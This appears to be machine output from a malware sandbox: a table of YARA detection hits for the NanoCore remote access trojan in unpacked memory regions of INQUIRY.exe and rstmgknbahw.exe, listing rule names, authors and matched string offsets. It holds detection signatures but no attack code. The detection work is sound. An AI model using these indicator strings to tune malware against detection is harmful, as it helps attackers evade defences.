1.2.INQUIRY.exe.22f1458.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
1.2.INQUIRY.exe.22f1458.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.INQUIRY.exe.22f1458.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.rstmgknbahw.exe.2400000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.rstmgknbahw.exe.2400000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
5.2.rstmgknbahw.exe.2400000.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.rstmgknbahw.exe.2400000.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
6.2.rstmgknbahw.exe.27c68dc.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.38d3258.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.38d3258.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.38d3258.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.38d3258.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.2.INQUIRY.exe.415058.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.415058.1.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.415058.1.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.415058.1.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
2.2.INQUIRY.exe.39a98c0.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
2.2.INQUIRY.exe.39a98c0.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.39a98c0.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x85e5:$x1: NanoCore.ClientPluginHost 0x8622:$x2: IClientNetworkHost 0xc155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x835d:$x1: NanoCore Client.exe 0x85e5:$x2: NanoCore.ClientPluginHost 0x9c1e:$s1: PluginCommand 0x9c12:$s2: FileCommand 0xaac3:$s3: PipeExists 0x1087a:$s4: PipeCreated 0x860f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x834d:$a: NanoCore 0x835d:$a: NanoCore 0x8591:$a: NanoCore 0x85a5:$a: NanoCore 0x85e5:$a: NanoCore 0x83ac:$b: ClientPlugin 0x85ae:$b: ClientPlugin 0x85ee:$b: ClientPlugin 0x84d3:$c: ProjectData 0x8eda:$d: DESCrypto 0x108a6:$e: KeepAlive 0xe894:$g: LogClientMessage 0xaa8f:$i: get_Connected 0x9210:$j: #=q 0x9240:$j: #=q 0x925c:$j: #=q 0x928c:$j: #=q 0x92a8:$j: #=q 0x92c4:$j: #=q 0x92f4:$j: #=q 0x9310:$j: #=q
2.2.INQUIRY.exe.782558.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.782558.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.782558.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.782558.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.0.rstmgknbahw.exe.400000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.2.rstmgknbahw.exe.38d3258.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.38d3258.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.38d3258.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.38d3258.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.rstmgknbahw.exe.3820e14.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
6.2.rstmgknbahw.exe.3820e14.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.3820e14.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.rstmgknbahw.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
4.2.rstmgknbahw.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.rstmgknbahw.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
2.2.INQUIRY.exe.2520000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.2.INQUIRY.exe.2520000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
2.2.INQUIRY.exe.2520000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.2.INQUIRY.exe.2520000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.0.rstmgknbahw.exe.400000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.0.rstmgknbahw.exe.400000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
6.0.rstmgknbahw.exe.400000.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.0.rstmgknbahw.exe.400000.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
1.2.INQUIRY.exe.22e0000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
1.2.INQUIRY.exe.22e0000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
1.2.INQUIRY.exe.22e0000.2.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
1.2.INQUIRY.exe.22e0000.2.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
6.2.rstmgknbahw.exe.4940000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.4940000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.4940000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.4940000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
6.2.rstmgknbahw.exe.37a3258.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.rstmgknbahw.exe.37a3258.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
6.2.rstmgknbahw.exe.37a3258.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.rstmgknbahw.exe.37a3258.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
4.0.rstmgknbahw.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.0.rstmgknbahw.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
2.0.INQUIRY.exe.400000.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
4.0.rstmgknbahw.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.0.rstmgknbahw.exe.400000.8.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
3.2.rstmgknbahw.exe.2300000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d9e5:$x1: NanoCore.ClientPluginHost 0x1da22:$x2: IClientNetworkHost 0x21555:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.2.rstmgknbahw.exe.2300000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d75d:$x1: NanoCore Client.exe 0x1d9e5:$x2: NanoCore.ClientPluginHost 0x1f01e:$s1: PluginCommand 0x1f012:$s2: FileCommand 0x1fec3:$s3: PipeExists 0x25c7a:$s4: PipeCreated 0x1da0f:$s5: IClientLoggingHost
3.2.rstmgknbahw.exe.2300000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.2.rstmgknbahw.exe.2300000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1d74d:$a: NanoCore 0x1d75d:$a: NanoCore 0x1d991:$a: NanoCore 0x1d9a5:$a: NanoCore 0x1d9e5:$a: NanoCore 0x1d7ac:$b: ClientPlugin 0x1d9ae:$b: ClientPlugin 0x1d9ee:$b: ClientPlugin 0x1d8d3:$c: ProjectData 0x1e2da:$d: DESCrypto 0x25ca6:$e: KeepAlive 0x23c94:$g: LogClientMessage 0x1fe8f:$i: get_Connected 0x1e610:$j: #=q 0x1e640:$j: #=q 0x1e65c:$j: #=q 0x1e68c:$j: #=q 0x1e6a8:$j: #=q 0x1e6c4:$j: #=q 0x1e6f4:$j: #=q 0x1e710:$j: #=q
2.0.INQUIRY.exe.400000.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
2.0.INQUIRY.exe.400000.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
2.0.INQUIRY.exe.400000.8.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
